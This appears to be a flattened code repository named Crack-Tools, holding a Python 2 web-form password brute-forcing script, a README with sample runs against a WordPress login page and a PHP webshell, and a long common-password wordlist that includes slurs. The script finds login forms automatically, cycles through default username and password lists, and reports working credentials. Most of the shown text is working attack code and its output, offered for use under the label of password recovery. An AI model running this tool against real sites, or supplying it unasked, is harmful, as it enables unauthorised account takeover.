├── .gitignore ├── LICENSE ├── README.md ├── crackform ├── README.md ├── crack_form.py └── dict │ ├── error.txt │ ├── password.txt │ └── webshell.txt ├── cracklinux ├── crack_linux.py ├── crack_user.txt └── dict.txt └── port_scan.py /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | 5 | # C extensions 6 | *.so 7 | 8 | # Distribution / packaging 9 | .Python 10 | env/ 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | *.egg-info/ 23 | .installed.cfg 24 | *.egg 25 | 26 | # PyInstaller 27 | # Usually these files are written by a python script from a template 28 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 29 | *.manifest 30 | *.spec 31 | 32 | # Installer logs 33 | pip-log.txt 34 | pip-delete-this-directory.txt 35 | 36 | # Unit test / coverage reports 37 | htmlcov/ 38 | .tox/ 39 | .coverage 40 | .coverage.* 41 | .cache 42 | nosetests.xml 43 | coverage.xml 44 | *,cover 45 | 46 | # Translations 47 | *.mo 48 | *.pot 49 | 50 | # Django stuff: 51 | *.log 52 | 53 | # Sphinx documentation 54 | docs/_build/ 55 | 56 | # PyBuilder 57 | target/ 58 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2015 MyKings 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | 23 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Crack-Tools 2 | 3 | Just a toolbox : ) 4 | -------------------------------------------------------------------------------- /crackform/README.md: -------------------------------------------------------------------------------- 1 | # formcrack 2 | 3 | 一个简单的 web 表单密码找回工具, 自动识别用户名与密码字段, 可以对 webshell 与网站进行密码找回 : ) 4 | 5 | ## 开发与运行环境 6 | 7 | * python 2.7.10 8 | * requests 9 | * BeautifulSoup4 10 | 11 | ## 如何安装与运行 12 | 13 | ### 安装 14 | 15 | ```bash 16 | $ pip install requests BeautifulSoup4 17 | 18 | ``` 19 | 20 | ### 运行 21 | 22 | ```bash 23 | $ python fromcrack.py 24 | 25 | usage: fromcrack.py [-h] -s URL [-a ACTION] [-t TIME] [-v] [-u U] [-U U] 26 | [-p P] [-P P] 27 | 28 | fromcrack.py: error: argument -s is required 29 | ``` 30 | 31 | ## 命令行参数说明 32 | 33 | 1. -s 34 | > 登陆地址, 如: http://目标/admin/login.php 35 | 36 | 1. -a 37 | > 表单提交的 action 地址, 指定表单提交地址. 38 | 39 | 1. -t 40 | > 延时请求, 单位(秒). 41 | 42 | 1. -v 43 | > 显示详细找回账号过程信息. 44 | 45 | 1. -u 46 | > (小写的u)指定一个用户名 47 | 48 | 1. -U 49 | > (大写的U)指定一个用户名列表文件 50 | 51 | 1. -p 52 | > (小写的p)指定一个密码 53 | 54 | 1. -P 55 | > (大写的P)指定一个密码列表文件 56 | 57 | ## 命令行参数演示 58 | 59 | 找回 wrodpress 账号与密码, 并且每次延时两秒 60 | 61 | ```bash 62 | $ python fromcrack.py -s http://172.16.213.179/wp-login.php -p admin123 -v -t 2 63 | target: [http://172.16.213.179/wp-login.php], user count: [10], password count: [1] ... 64 | [*] Test error data: [log=gkhrj&pwd=ubvasefy&rememberme=forever&wp-submit=%E7%99%BB%E5%BD%95&redirect_to=http%3A%2F%2F172.16.213.179%2Fwp-admin%2F&testcookie=1] 65 | [*] send crack data package: log=admin&pwd=admin123&rememberme=forever&wp-submit=%E7%99%BB%E5%BD%95&redirect_to=http%3A%2F%2F172.16.213.179%2Fwp-admin%2F&testcookie=1 66 | [+] == successful, user: [admin], password: [admin123] == 67 | ``` 68 | 69 | 找回 webshell 密码 70 | 71 | ```bash 72 | python fromcrack.py -s http://172.16.213.179/phpspy.php -P ./dict/webshell.txt -v 73 | target: [http://172.16.213.179/phpspy.php], user count: [10], password count: [1544] ... 74 | [*] Test error data: [spiderpass=xoykuplw&submit=%B7%A8%BF%CD%D0%A1%D7%E9%D1%A7%CF%B0%BD%BB%C1%F7%D7%A8%D3%C3] 75 | [*] send crack data package: spiderpass=pass&submit=%B7%A8%BF%CD%D0%A1%D7%E9%D1%A7%CF%B0%BD%BB%C1%F7%D7%A8%D3%C3 76 | [*] send crack data package: spiderpass=598971996&submit=%B7%A8%BF%CD%D0%A1%D7%E9%D1%A7%CF%B0%BD%BB%C1%F7%D7%A8%D3%C3 77 | [*] send crack data package: spiderpass=adminyouge&submit=%B7%A8%BF%CD%D0%A1%D7%E9%D1%A7%CF%B0%BD%BB%C1%F7%D7%A8%D3%C3 78 | [*] send crack data package: spiderpass=sbadmin&submit=%B7%A8%BF%CD%D0%A1%D7%E9%D1%A7%CF%B0%BD%BB%C1%F7%D7%A8%D3%C3 79 | [*] send crack data package: spiderpass=mkak5cpa&submit=%B7%A8%BF%CD%D0%A1%D7%E9%D1%A7%CF%B0%BD%BB%C1%F7%D7%A8%D3%C3 80 | [*] send crack data package: spiderpass=040627&submit=%B7%A8%BF%CD%D0%A1%D7%E9%D1%A7%CF%B0%BD%BB%C1%F7%D7%A8%D3%C3 81 | [*] send crack data package: spiderpass=123&submit=%B7%A8%BF%CD%D0%A1%D7%E9%D1%A7%CF%B0%BD%BB%C1%F7%D7%A8%D3%C3 82 | [*] send crack data package: spiderpass=xx&submit=%B7%A8%BF%CD%D0%A1%D7%E9%D1%A7%CF%B0%BD%BB%C1%F7%D7%A8%D3%C3 83 | [*] send crack data package: spiderpass=987987&submit=%B7%A8%BF%CD%D0%A1%D7%E9%D1%A7%CF%B0%BD%BB%C1%F7%D7%A8%D3%C3 84 | [*] send crack data package: spiderpass=adminasb&submit=%B7%A8%BF%CD%D0%A1%D7%E9%D1%A7%CF%B0%BD%BB%C1%F7%D7%A8%D3%C3 85 | [*] send crack data package: spiderpass=admin&submit=%B7%A8%BF%CD%D0%A1%D7%E9%D1%A7%CF%B0%BD%BB%C1%F7%D7%A8%D3%C3 86 | [+] == successful, password: [admin] == 87 | ``` 88 | 89 | ## 待开发完善功能 90 | 91 | * 验证码提醒与跳过 92 | * 加入了错误信息判断功能,即输入密码错误的时候,从dic/error.txt文件里面读取错误的提示进行判断,原来的方式有bug,没有进行错误信息判断,随便读取一个密码都认为是正确的密码。 93 | 第264行 status_error=content.count(error_info) #计算error_info字符出现的次数 94 | -------------------------------------------------------------------------------- /crackform/crack_form.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding: utf8 3 | 4 | """ 5 | 一个 web 密码找回工具 6 | 版本: 0.2.0 - (2016-01-08) 7 | 作者: MyKings & pt007@vip.sina.com 8 | """ 9 | 10 | import urlparse 11 | import random 12 | import urllib 13 | import re 14 | import time 15 | import os 16 | import argparse 17 | 18 | import requests 19 | 20 | from bs4 import BeautifulSoup 21 | 22 | # 用户字典 23 | USER_NAME_LIST = [ 24 | 'admin', 25 | 'root', 26 | 'test', 27 | 'guest', 28 | 'info', 29 | 'adm', 30 | 'user', 31 | 'administrator', 32 | 'oracle', 33 | 'demo', 34 | ] 35 | 36 | USER_PASSWD_LIST = [ 37 | 'admin', 'admin888', 'admin123', '111111', '1234', '12345', '123456', 38 | '1234567', '12345678', 'abc123', 'dragon', 'iloveyou', 'letmein', 39 | 'monkey', 'password', 'qwerty', 'tequiero', 'test', 'demo', 'guest' 40 | ] 41 | 42 | # 参数匹配 43 | INPUT_USER_REGEX = [ 44 | 'username', 45 | 'j_username', 46 | 'login', 47 | 'name', 48 | 'user', 49 | 'account', 50 | 'input1', 51 | 'mail' 52 | ] 53 | 54 | # 忽略参数 55 | INPUT_IGNORE_PARAM = [ 56 | 'captcha', 57 | 'vcode', 58 | u'验证码', 59 | ] 60 | 61 | DEBUG = False 62 | 63 | 64 | def get_random_str(lenght=7): 65 | """返回指定长度的随机字符""" 66 | return ''.join(random.sample('zyxwvutsrqponmlkjihgfedcba', lenght)) 67 | 68 | 69 | def get_list_by_file(filehandler): 70 | """""" 71 | f_list = [] 72 | if filehandler: 73 | for line in filehandler: 74 | if line.strip() not in f_list: 75 | f_list.append(line.strip()) 76 | return f_list 77 | 78 | 79 | def find_crack_form(config={}): 80 | """ 81 | 找到破解表单 82 | """ 83 | target = None 84 | if config: 85 | u_parser = urlparse.urlparse(config['url']) 86 | resp = requests.get(config['url'], 87 | timeout=config.get('timeout', 30), 88 | headers=config.get('headers'), 89 | verify=True) 90 | 91 | if resp and resp.content: 92 | target = {'action': '', 'cookie': '', 'method': 'GET', 'raw_data': '', 'input_list': []} 93 | soup = BeautifulSoup(resp.content, 'html.parser') 94 | 95 | # 0x00 分析出要破解的表单 96 | crack_from = None 97 | forms = soup.findAll('form') 98 | for form in forms: 99 | inputs = form.findAll('input') 100 | # 表单中是否有密码字段,密码次数为 1 才进行破解 101 | find_passwd_count = 0 102 | input_list = [] 103 | for input in inputs: 104 | if input.get('type') == 'password': 105 | find_passwd_count += 1 106 | input_list.append({ 107 | 'type': input.get('type'), 108 | 'name': input.get('name'), 109 | 'id': input.get('id'), 110 | 'value': input.get('value') 111 | }) 112 | # 表单处理 113 | if find_passwd_count == 1: 114 | crack_from = form 115 | target['input_list'] = input_list 116 | for item in input_list: 117 | value = '' 118 | if item['type'] == 'password': 119 | value = '{{PASSWORD}}' 120 | elif item['type'] == 'text': 121 | for regex in INPUT_USER_REGEX: 122 | if re.search(regex, item['id'] or item['name'], re.I): 123 | value = '{{USERNAME}}' 124 | break 125 | #for regex in INPUT_IGNORE_PARAM: 126 | # if re.search(regex, item['name'] or item['id'], re.I): 127 | # print '[-] Discover authentication code [%s], exit to crack.' % item['name'] or item['id'] 128 | # sys.exit(0) 129 | # 处理非 password 与text类型 130 | if not value and item['value']: 131 | value = urllib.quote_plus(item['value'].encode(resp.encoding)) 132 | 133 | if item['name']: 134 | name = item['name'] 135 | elif item['id']: 136 | name = item['id'] 137 | else: 138 | name = item['type'] 139 | 140 | target['raw_data'] += '%s=%s&' % (name, value) 141 | break 142 | 143 | # 0x01 找到验证地址 144 | if crack_from: 145 | action = crack_from.get('action') 146 | if u_parser.path and '/' in u_parser.path and not str(action).startswith('/'): 147 | file_path, file_ext = os.path.splitext(u_parser.path) 148 | if file_ext: 149 | file_path = os.path.dirname(file_path) 150 | uri = '%s://%s%s/%s' % (u_parser.scheme, u_parser.netloc, file_path, action) 151 | else: 152 | uri = urlparse.urljoin('%s://%s/' % (u_parser.scheme, u_parser.netloc), action) 153 | 154 | target['method'] = crack_from.get('method', 'GET') 155 | if target['raw_data']: 156 | target['raw_data'] = target['raw_data'][:-1] 157 | 158 | if not action: 159 | target['action'] = resp.url 160 | elif action and u_parser.netloc in action or 'http://' in action: 161 | target['action'] = action 162 | else: 163 | target['action'] = uri 164 | 165 | if resp and 'set-cookie' in resp.headers: 166 | target['cookie'] = resp.headers['set-cookie'] 167 | if config['headers']: 168 | config['headers']['Cookie'] = target['cookie'] 169 | return target 170 | 171 | 172 | def error_test(target={}, config={}): 173 | """ 174 | 错误测试 175 | """ 176 | result = {} 177 | if target and target['action'] and config: 178 | if config['action']: 179 | action_url = config['action'] 180 | else: 181 | action_url = target['action'] 182 | result = {'stats_code': -1, 'content_lenght': -1, 'url': '', 'cookie': ''} 183 | err_user = get_random_str(5) 184 | err_pass = get_random_str(8) 185 | raw_data = target['raw_data'].replace('{{USERNAME}}', err_user) 186 | raw_data = raw_data.replace('{{PASSWORD}}', err_pass) 187 | if config['v']: 188 | print '[*] Test error data: [%s]' % raw_data 189 | if str(target['method']).upper() == 'GET': 190 | if '?' in target['action']: 191 | url = '%s&%s' % (action_url, raw_data) 192 | else: 193 | url = '%s?%s' % (action_url, raw_data) 194 | resp = requests.get(url, 195 | timeout=config.get('timeout', 30), 196 | headers=config.get('headers'), 197 | verify=False) 198 | else: 199 | resp = requests.post(action_url, 200 | data=raw_data, 201 | timeout=config.get('timeout', 30), 202 | headers=config.get('headers'), 203 | verify=False) 204 | # TODO: 参数过滤判断 205 | result['stats_code'] = resp.status_code 206 | result['content_lenght'] = len(resp.content) 207 | result['url'] = resp.url 208 | 209 | if 'set-cookie' in resp.headers: 210 | result['cookie'] = resp.headers['set-cookie'] 211 | elif 'cookie' in resp.headers: 212 | result['cookie'] = resp.headers['cookie'] 213 | 214 | return result 215 | 216 | 217 | def crack_form(target={}, err_result={}, config={}): 218 | """ 219 | 开始破解 220 | """ 221 | user_info = None 222 | if target: 223 | if config['action']: 224 | action_url = config['action'] 225 | else: 226 | action_url = target['action'] 227 | find_name = False 228 | for user in config['user_list']: 229 | find_pass = False 230 | for passwd in config['passwd_list']: 231 | time.sleep(config['time']) 232 | raw_data = target['raw_data'] 233 | if '{{USERNAME}}' in raw_data: 234 | raw_data = target['raw_data'].replace('{{USERNAME}}', user) 235 | find_name = True 236 | raw_data = raw_data.replace('{{PASSWORD}}', passwd) 237 | if config['v']: 238 | print '[*] send crack data package: %s' % raw_data 239 | if str(target['method']).upper() == 'GET': 240 | if '?' in target['action']: 241 | url = '%s&%s' % (action_url, raw_data) 242 | else: 243 | url = '%s?%s' % (action_url, raw_data) 244 | resp = requests.get(url, 245 | timeout=config.get('timeout', 30), 246 | headers=config.get('headers'), 247 | verify=False, 248 | allow_redirects=True) 249 | else: 250 | resp = requests.post(action_url, 251 | data=raw_data, 252 | timeout=config.get('timeout', 30), 253 | headers=config.get('headers'), 254 | verify=False, 255 | allow_redirects=True) 256 | 257 | content = resp.content 258 | 259 | for error_info in config['error_list']: 260 | status_error = content.count(error_info) 261 | 262 | print 'error_info=%s ,status_error=%s\n' % (error_info, status_error) 263 | 264 | if err_result and resp: 265 | if 'cookie' in resp.headers: 266 | cookies = resp.headers['cookie'] 267 | elif 'set-cookie' in resp.headers: 268 | cookies = resp.headers['set-cookie'] 269 | else: 270 | cookies = None 271 | 272 | result = { 273 | 'stats_code': resp.status_code, 274 | 'content_lenght': len(resp.content), 275 | 'url': resp.url, 276 | 'cookie': cookies 277 | } 278 | 279 | if err_result['content_lenght'] != len(resp.content) and resp.status_code in (302, 200): 280 | if resp.url != err_result['url'] or (cookies and cookies != err_result['cookie']): 281 | if DEBUG: 282 | print '<', '-'*40 283 | print 'DEBUG:', result 284 | print '-'*40, '>' 285 | if find_name and status_error == 0: 286 | user_info = {'u': user, 'p': passwd} 287 | print '[+] == successful, user: [%s], password: [%s] ==' % (user, passwd) 288 | elif status_error == 0: 289 | user_info = {'p': passwd} 290 | print '[+] == successful, password: [%s] ==' % passwd 291 | find_pass = True 292 | break 293 | 294 | if (find_pass or find_name) and user_info['p']: 295 | break 296 | 297 | if not user_info: 298 | print '[-] form crack failure.' 299 | 300 | return user_info 301 | 302 | 303 | def main(config={}): 304 | """""" 305 | if config and config['url']: 306 | try: 307 | target = find_crack_form(config) 308 | if DEBUG: 309 | print '<', '-'*40 310 | print 'DEBUG:', target 311 | print '-'*40, '>' 312 | err_result = error_test(target, config) 313 | if DEBUG: 314 | print '<', '-'*40 315 | print 'DEBUG:', err_result 316 | print '-'*40, '>' 317 | crack_form(target, err_result, config) 318 | except Exception as ex: 319 | print '[*] ERROR:', ex.message 320 | 321 | 322 | def cmdline(): 323 | parser = argparse.ArgumentParser(description='Crack WebForm Tool.') 324 | parser.add_argument('-s', dest='url', required=True, help='login URL') 325 | parser.add_argument('-a', dest='action', help='action URL') 326 | parser.add_argument('-t', dest='time', default=0, type=int, help='action URL') 327 | parser.add_argument('-v', action="store_true", help='show details') 328 | parser.add_argument('-u', help='username') 329 | parser.add_argument('-U', type=file, help='username list file',) 330 | parser.add_argument('-p', help='password') 331 | parser.add_argument('-P', type=file, help='password list file') 332 | parser.add_argument('-E', type=file, help='error info list file', default='./dict/error.txt') 333 | args = parser.parse_args() 334 | config = args.__dict__ 335 | 336 | if not config['url'].startswith('http'): 337 | config['url'] = 'http://%s' % config['url'] 338 | config['user_list'] = [] 339 | config['passwd_list'] = [] 340 | config['timeout'] = 10 341 | config['headers'] = {} 342 | config['headers']['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 ' \ 343 | '(KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36' 344 | config['headers']['Referer'] = config['url'] 345 | config['headers']['Content-Type'] = 'application/x-www-form-urlencoded' 346 | 347 | if config['E']: 348 | config['error_list'] = get_list_by_file(config['E']) 349 | 350 | if config['U']: 351 | config['user_list'] = get_list_by_file(config['U']) 352 | if config['P']: 353 | config['passwd_list'] = get_list_by_file(config['P']) 354 | 355 | if config['u']: 356 | config['user_list'].append(config['u']) 357 | 358 | if config['p']: 359 | config['passwd_list'].append(config['p']) 360 | 361 | if not config['user_list']: 362 | config['user_list'] = USER_NAME_LIST 363 | if not config['passwd_list']: 364 | config['passwd_list'] = USER_PASSWD_LIST 365 | 366 | if config['v']: 367 | print 'target: [%s], user count: [%d], ' \ 368 | 'password count: [%d] ...' % (config['url'], 369 | len(config['user_list']), 370 | len(config['passwd_list'])) 371 | 372 | return config 373 | 374 | 375 | if __name__ == '__main__': 376 | main(cmdline()) 377 | -------------------------------------------------------------------------------- /crackform/dict/error.txt: -------------------------------------------------------------------------------- 1 | name="j_password" 2 | -------------------------------------------------------------------------------- /crackform/dict/password.txt: -------------------------------------------------------------------------------- 1 | ------ 2 | 0 3 | 00000 4 | 000000 5 | 0000000 6 | 00000000 7 | 0987654321 8 | 1 9 | 1111 10 | 11111 11 | 111111 12 | 1111111 13 | 11111111 14 | 112233 15 | 1212 16 | 121212 17 | 123 18 | 123123 19 | 12321 20 | 123321 21 | 1234 22 | 12345 23 | 123456 24 | 1234567 25 | 12345678 26 | 123456789 27 | 1234567890 28 | 123456a 29 | 1234abcd 30 | 1234qwer 31 | 123abc 32 | 123asd 33 | 123asdf 34 | 123qwe 35 | 12axzas21a 36 | 1313 37 | 131313 38 | 147852 39 | 1q2w3e 40 | 1qwerty 41 | 2000 42 | 2112 43 | 2222 44 | 22222 45 | 222222 46 | 2222222 47 | 22222222 48 | 232323 49 | 252525 50 | 256879 51 | 3333 52 | 33333 53 | 333333 54 | 3333333 55 | 33333333 56 | 36633663 57 | 4128 58 | 4321 59 | 4444 60 | 44444 61 | 444444 62 | 4444444 63 | 44444444 64 | 485112 65 | 514007 66 | 5150 67 | 54321 68 | 5555 69 | 55555 70 | 555555 71 | 5555555 72 | 55555555 73 | 654321 74 | 6666 75 | 66666 76 | 666666 77 | 6666666 78 | 66666666 79 | 6969 80 | 696969 81 | 7654321 82 | 7777 83 | 77777 84 | 777777 85 | 7777777 86 | 77777777 87 | 786786 88 | 8675309 89 | 87654321 90 | 88888 91 | 888888 92 | 8888888 93 | 88888888 94 | 987654 95 | 987654321 96 | 99999 97 | 999999 98 | 9999999 99 | 99999999 100 | Admin 101 | a123456 102 | a1b2c3 103 | aaaa 104 | aaaaa 105 | aaaaaa 106 | abc123 107 | abcdef 108 | abgrtyu 109 | academia 110 | access 111 | access14 112 | account 113 | action 114 | admin 115 | admin1 116 | admin12 117 | admin123 118 | adminadmin 119 | administrator 120 | adriana 121 | agosto 122 | agustin 123 | albert 124 | alberto 125 | alejandra 126 | alejandro 127 | alex 128 | alexis 129 | alpha 130 | amanda 131 | amanda1 132 | amateur 133 | america 134 | amigos 135 | andrea 136 | andrew 137 | angel 138 | angela 139 | angelica 140 | angelito 141 | angels 142 | animal 143 | anthony 144 | anthony1 145 | anything 146 | apollo 147 | apple 148 | apples 149 | argentina 150 | armando 151 | arsenal 152 | arthur 153 | arturo 154 | asddsa 155 | asdf 156 | asdf123 157 | asdf1234 158 | asdfasdf 159 | asdfgh 160 | asdsa 161 | asdzxc 162 | ashley 163 | ashley1 164 | aspateso19 165 | asshole 166 | august 167 | august07 168 | aurelie 169 | austin 170 | az1943 171 | baby 172 | babygirl 173 | babygirl1 174 | babygurl1 175 | backup 176 | backupexec 177 | badboy 178 | bailey 179 | ballin1 180 | banana 181 | barbara 182 | barcelona 183 | barney 184 | baseball 185 | baseball1 186 | basketball 187 | batman 188 | batman1 189 | beach 190 | bean21 191 | bear 192 | beatles 193 | beatriz 194 | beaver 195 | beavis 196 | beebop 197 | beer 198 | benito 199 | berenice 200 | betito 201 | bichilora 202 | bigcock 203 | bigdaddy 204 | bigdick 205 | bigdog 206 | bigtits 207 | bill 208 | billy 209 | birdie 210 | bisounours 211 | bitch 212 | bitch1 213 | bitches 214 | biteme 215 | black 216 | blahblah 217 | blazer 218 | blessed 219 | blink182 220 | blonde 221 | blondes 222 | blowjob 223 | blowme 224 | blue 225 | bodhisattva 226 | bond007 227 | bonita 228 | bonnie 229 | booboo 230 | boobs 231 | booger 232 | boomer 233 | booty 234 | boss123 235 | boston 236 | brandon 237 | brandon1 238 | brandy 239 | braves 240 | brazil 241 | brian 242 | bronco 243 | broncos 244 | brooklyn 245 | brujita 246 | bubba 247 | bubbles 248 | bubbles1 249 | buddy 250 | bulldog 251 | business 252 | buster 253 | butter 254 | butterfly 255 | butthead 256 | caballo 257 | cachonda 258 | calvin 259 | camaro 260 | cameron 261 | camila 262 | campus 263 | canada 264 | captain 265 | carlos 266 | carmen 267 | carmen1 268 | carolina 269 | carter 270 | casper 271 | changeme 272 | charles 273 | charlie 274 | charlie1 275 | cheese 276 | cheese1 277 | chelsea 278 | chester 279 | chevy 280 | chicago 281 | chicken 282 | chicken1 283 | chocolate 284 | chocolate! 285 | chocolate1 286 | chris 287 | chris6 288 | christ 289 | christian 290 | clustadm 291 | cluster 292 | cocacola 293 | cock 294 | codename 295 | codeword 296 | coffee 297 | college 298 | compaq 299 | computer 300 | computer1 301 | consuelo 302 | controller 303 | cookie 304 | cookie1 305 | cool 306 | cooper 307 | corvette 308 | cowboy 309 | cowboys 310 | coyote 311 | cream 312 | cristian 313 | cristina 314 | crystal 315 | cumming 316 | cumshot 317 | cunt 318 | customer 319 | dakota 320 | dallas 321 | daniel 322 | danielle 323 | dantheman 324 | database 325 | dave 326 | david 327 | debbie 328 | default 329 | dell 330 | dennis 331 | desktop 332 | diablo 333 | diamond 334 | dick 335 | dirty 336 | dmsmcb 337 | dmz 338 | doctor 339 | doggie 340 | dolphin 341 | dolphins 342 | domain 343 | domino 344 | donald 345 | dragon 346 | dragons 347 | dreams 348 | driver 349 | eagle 350 | eagle1 351 | eagles 352 | eduardo 353 | edward 354 | einstein 355 | elijah 356 | elite 357 | elizabeth 358 | elizabeth1 359 | eminem 360 | enamorada 361 | enjoy 362 | enter 363 | eric 364 | erotic 365 | estefania 366 | estrella 367 | example 368 | exchadm 369 | exchange 370 | explorer 371 | extreme 372 | faggot 373 | faithful 374 | falcon 375 | family 376 | fantasia 377 | felicidad 378 | felipe 379 | fender 380 | fernando 381 | ferrari 382 | files 383 | fire 384 | firebird 385 | fish 386 | fishing 387 | florida 388 | flower 389 | fluffy1 390 | flyers 391 | foobar 392 | foofoo 393 | football 394 | football1 395 | ford 396 | forever 397 | forever1 398 | forum 399 | francisco 400 | frank 401 | fred 402 | freddy 403 | freedom 404 | friends 405 | friends1 406 | frogfrog 407 | ftp 408 | fuck 409 | fucked 410 | fucker 411 | fucking 412 | fuckme 413 | fuckoff 414 | fuckyou 415 | fuckyou! 416 | fuckyou1 417 | fuckyou2 418 | futbol 419 | futbol02 420 | gabriela 421 | games 422 | gandalf 423 | garou324 424 | gateway 425 | gatito 426 | gators 427 | gemini 428 | george 429 | giants 430 | ginger 431 | girl 432 | girls 433 | godisgood 434 | godslove 435 | golden 436 | golf 437 | golfer 438 | gordon 439 | great 440 | green 441 | green1 442 | greenday1 443 | gregory 444 | guest 445 | guitar 446 | gunner 447 | hacker 448 | hammer 449 | hannah 450 | hannover23 451 | happy 452 | hardcore 453 | harley 454 | heather 455 | heaven 456 | hector 457 | hello 458 | hello1 459 | helpme 460 | hentai 461 | hermosa 462 | hockey 463 | hockey1 464 | hollister1 465 | home123 466 | hooters 467 | horney 468 | horny 469 | hotdog 470 | hottie 471 | house 472 | hunter 473 | hunting 474 | iceman 475 | ihavenopass 476 | ikebanaa 477 | iknowyoucanreadthis 478 | iloveu 479 | iloveu1 480 | iloveyou 481 | iloveyou! 482 | iloveyou. 483 | iloveyou1 484 | iloveyou2 485 | iloveyou3 486 | internet 487 | intranet 488 | isabel 489 | iwantu 490 | jack 491 | jackie 492 | jackson 493 | jaguar 494 | jake 495 | james 496 | jamesbond 497 | jamies 498 | japan 499 | jasmine 500 | jason 501 | jasper 502 | javier 503 | jennifer 504 | jer2911 505 | jeremy 506 | jericho 507 | jessica 508 | jesus1 509 | jesusc 510 | jesuschrist 511 | john 512 | john316 513 | johnny 514 | johnson 515 | jordan 516 | jordan1 517 | jordan23 518 | jorgito 519 | joseph 520 | joshua 521 | joshua1 522 | juice 523 | junior 524 | justin 525 | justin1 526 | kakaxaqwe 527 | kakka 528 | kelly 529 | kelson 530 | kevin 531 | kevinn 532 | killer 533 | king 534 | kitten 535 | kitty 536 | knight 537 | ladies 538 | lakers 539 | lauren 540 | leather 541 | legend 542 | legolas 543 | lemmein 544 | letitbe 545 | letmein 546 | libertad 547 | little 548 | liverpool 549 | liverpool1 550 | login 551 | london 552 | loser1 553 | lotus 554 | love 555 | love123 556 | lovely 557 | loveme 558 | loveme1 559 | lover 560 | lovers 561 | loveyou 562 | loveyou1 563 | lucky 564 | maddog 565 | madison 566 | madman 567 | maggie 568 | magic 569 | magnum 570 | mallorca 571 | manager 572 | manolito 573 | margarita 574 | maria 575 | marie1 576 | marine 577 | mariposa 578 | mark 579 | market 580 | marlboro 581 | martin 582 | martina 583 | marvin 584 | master 585 | matrix 586 | matt 587 | matthew 588 | matthew1 589 | maverick 590 | maxwell 591 | melissa 592 | member 593 | menace 594 | mercedes 595 | merlin 596 | messenger 597 | metallica 598 | mexico 599 | miamor 600 | michael 601 | michael1 602 | michelle 603 | mickey 604 | midnight 605 | miguelangel 606 | mike 607 | miller 608 | mine 609 | mistress 610 | moikka 611 | mokito 612 | money 613 | money159 614 | mongola 615 | monica 616 | monisima 617 | monitor 618 | monkey 619 | monkey1 620 | monster 621 | morenita 622 | morgan 623 | mother 624 | mountain 625 | movie 626 | muffin 627 | multimedia 628 | murphy 629 | music 630 | mustang 631 | mypass 632 | mypassword 633 | mypc123 634 | myriam 635 | myspace1 636 | naked 637 | nana 638 | nanacita 639 | nascar 640 | nataliag 641 | natation 642 | nathan 643 | naub3. 644 | naughty 645 | ncc1701 646 | negrita 647 | newyork 648 | nicasito 649 | nicholas 650 | nicole 651 | nicole1 652 | nigger 653 | nigger1 654 | nimda 655 | ninja 656 | nipple 657 | nipples 658 | nirvana1 659 | nobody 660 | nomeacuerdo 661 | nonono 662 | nopass 663 | nopassword 664 | notes 665 | nothing 666 | noviembre 667 | nuevopc 668 | number1 669 | office 670 | oliver 671 | oracle 672 | orange 673 | orange1 674 | otalab 675 | ou812 676 | owner 677 | packers 678 | paloma 679 | pamela 680 | pana 681 | panda1 682 | panther 683 | panties 684 | papito 685 | paramo 686 | paris 687 | parisdenoia 688 | parker 689 | pasion 690 | pass 691 | pass1 692 | pass12 693 | pass123 694 | passion 695 | passport 696 | passw0rd 697 | passwd 698 | password 699 | password! 700 | password. 701 | password1 702 | password12 703 | password123 704 | password2 705 | password3 706 | pastor 707 | patoclero 708 | patricia 709 | patrick 710 | paul 711 | paulis 712 | pavilion 713 | peace 714 | peaches 715 | peanut 716 | pelirroja 717 | pendejo 718 | penis 719 | pepper 720 | pericles 721 | perkele 722 | perlita 723 | perros 724 | petalo 725 | peter 726 | phantom 727 | phoenix 728 | phpbb 729 | pierre 730 | piff 731 | piolin 732 | pirate 733 | piscis 734 | playboy 735 | player 736 | please 737 | poetry 738 | pokemon 739 | poohbear1 740 | pookie 741 | poonam 742 | popeye 743 | porn 744 | porno 745 | porque 746 | porsche 747 | power 748 | praise 749 | prayer 750 | presario 751 | pretty 752 | prince 753 | princesa 754 | princess 755 | princess1 756 | print 757 | private 758 | public 759 | pukayaco14 760 | pulgas 761 | purple 762 | pussies 763 | pussy 764 | pw123 765 | q1w2e3 766 | qazwsx 767 | qazwsxedc 768 | qosqomanta 769 | qqqqq 770 | qwe123 771 | qweasd 772 | qweasdzxc 773 | qweewq 774 | qwert 775 | qwerty 776 | qwerty1 777 | qwerty12 778 | qwerty80 779 | qwertyui 780 | qwewq 781 | rabbit 782 | rachel 783 | racing 784 | rafael 785 | rafaeltqm 786 | raiders 787 | rainbow 788 | rallitas 789 | random 790 | ranger 791 | rangers 792 | rapture 793 | realmadrid 794 | rebecca 795 | redskins 796 | redsox 797 | redwings 798 | rejoice 799 | replicate 800 | republica 801 | requiem 802 | rghy1234 803 | ricardo 804 | richard 